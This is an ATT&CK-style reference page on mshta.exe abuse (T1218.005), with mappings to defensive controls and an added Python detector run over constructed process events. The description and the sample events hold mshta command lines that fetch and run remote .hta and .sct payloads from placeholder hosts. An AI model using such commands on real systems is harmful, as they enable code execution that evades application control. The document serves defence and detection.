T1218.005 Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files, JavaScript, or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)


CRI Profile Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
| --- | --- | --- | --- | --- | --- |
| PR.PS-05.02 | Mobile code prevention | Mitigates | T1218.005 | Mshta | |

Comments

Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source.

NIST 800-53 Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
| --- | --- | --- | --- | --- | --- |
| CM-06 | Configuration Settings | mitigates | T1218.005 | Mshta | |
| CM-11 | User-installed Software | mitigates | T1218.005 | Mshta | |
| SI-16 | Memory Protection | mitigates | T1218.005 | Mshta | |
| RA-05 | Vulnerability Monitoring and Scanning | mitigates | T1218.005 | Mshta | |
| CM-08 | System Component Inventory | mitigates | T1218.005 | Mshta | |
| SI-10 | Information Input Validation | mitigates | T1218.005 | Mshta | |
| SI-03 | Malicious Code Protection | mitigates | T1218.005 | Mshta | |
| SI-07 | Software, Firmware, and Information Integrity | mitigates | T1218.005 | Mshta | |
| CM-02 | Baseline Configuration | mitigates | T1218.005 | Mshta | |
| CM-07 | Least Functionality | mitigates | T1218.005 | Mshta | |
| SI-04 | System Monitoring | mitigates | T1218.005 | Mshta | |

VERIS Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
| --- | --- | --- | --- | --- | --- |
| action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1218.005 | Mshta | |

Azure Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
| --- | --- | --- | --- | --- | --- |
| alerts_for_windows_machines | Alerts for Windows Machines | technique_scores | T1218.005 | Mshta | |

Comments

This control may detect suspicious usage of Mshta to execute PowerShell and suspicious Rundll32 execution. The following alerts may be generated: "Detected suspicious execution via rundll32.exe", "Detected suspicious combination of HTA and PowerShell".

GCP Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
| --- | --- | --- | --- | --- | --- |
| google_secops | Google Security Operations | technique_scores | T1218.005 | Mshta | |

Comments

Google Security Ops is able to trigger an alert based on using MSHTA to call a remote HTML application on Windows (e.g., "mshta.+http"). This technique was scored as minimal based on a low or uncertain detection coverage factor.

https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/mitre_attack/T1218_005_windows_mshta_remote_usage.yaral
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/ioc_sigma/windows/mshta_spwaned_by_svchost_as_seen_in_lethalhta__sysmon.yaral
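The following is an added example and is not part of this mapping page, of ATT&CK, or of the linked Chronicle or Azure rules. It implements, in Python, the four mshta.exe patterns this page names (a remote http(s) resource on the mshta command line, which is the idea behind the "mshta.+http" Google SecOps rule; the inline vbscript:/javascript: form from the technique description; mshta spawned by svchost.exe, as in the second linked rule; and PowerShell launched from mshta, as in the Azure "HTA and PowerShell" alert) and runs them over constructed Sysmon Event ID 1 style process-creation records. The `ProcessEvent` fields, the file paths and the `example.invalid` URLs are all constructed for illustration.

```python
"""Detection logic for the mshta.exe (T1218.005) abuse patterns named on this page,
run over constructed Sysmon Event ID 1 (process creation) style records.
Added example; not code from MITRE, Chronicle or Microsoft."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (field names are assumptions, not Sysmon's)."""
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the created process


def image_name(path: str) -> str:
    """Return the lower-cased executable name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_mshta(path: str) -> bool:
    return image_name(path) == "mshta.exe"


REMOTE_URL = re.compile(r"https?://", re.I)
# Script-protocol handlers used for inline execution instead of a file argument.
INLINE_PROTO = re.compile(r"\b(vbscript|javascript):", re.I)


def mshta_remote_url(e: ProcessEvent) -> bool:
    """mshta with an http(s) resource on its command line ("mshta.+http" idea).
    Also catches inline scripts whose GetObject() pulls a remote .sct."""
    return is_mshta(e.image) and REMOTE_URL.search(e.command_line) is not None


def mshta_inline_script(e: ProcessEvent) -> bool:
    """mshta given a vbscript:/javascript: inline script rather than an .hta path."""
    return is_mshta(e.image) and INLINE_PROTO.search(e.command_line) is not None


def mshta_spawned_by_svchost(e: ProcessEvent) -> bool:
    """mshta started by svchost.exe, i.e. via COM activation rather than a user shell."""
    return is_mshta(e.image) and image_name(e.parent_image) == "svchost.exe"


def powershell_child_of_mshta(e: ProcessEvent) -> bool:
    """PowerShell launched by mshta (the HTA + PowerShell combination)."""
    return is_mshta(e.parent_image) and image_name(e.image) in ("powershell.exe", "pwsh.exe")


RULES = {
    "mshta_remote_url": mshta_remote_url,
    "mshta_inline_script": mshta_inline_script,
    "mshta_spawned_by_svchost": mshta_spawned_by_svchost,
    "powershell_child_of_mshta": powershell_child_of_mshta,
}


def evaluate(event: ProcessEvent) -> list[str]:
    """Names of all rules that fire on one event, sorted for stable output."""
    return sorted(name for name, rule in RULES.items() if rule(event))


def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """(index, fired rules) for every event that triggers at least one rule."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]


# Constructed sample events; none of these is a real observation.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta http://example.invalid/payload.hta"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 'mshta vbscript:Close(Execute("GetObject(""script:https://example.invalid/payload.sct"")"))'),
    ProcessEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\System32\svchost.exe",
                 "mshta.exe -Embedding"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden"),
    # Local .hta from an installed product: none of the four rules fire on it.
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r'mshta.exe "C:\Program Files\Vendor\Tool\console.hta"'),
    # A browser with a URL argument must not trip the mshta rules.
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\explorer.exe", "chrome.exe http://example.invalid/"),
]

if __name__ == "__main__":
    for index, fired in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(fired)}")
```

The fifth sample shows the coverage gap the page's "minimal" score reflects: a locally stored .hta launched by a user is not caught by any of these four rules, so an inventory of legitimate HTA use (CM-08) combined with blocking or restricting mshta.exe where it is not needed (CM-07, PR.PS-05.02) still has to carry that case.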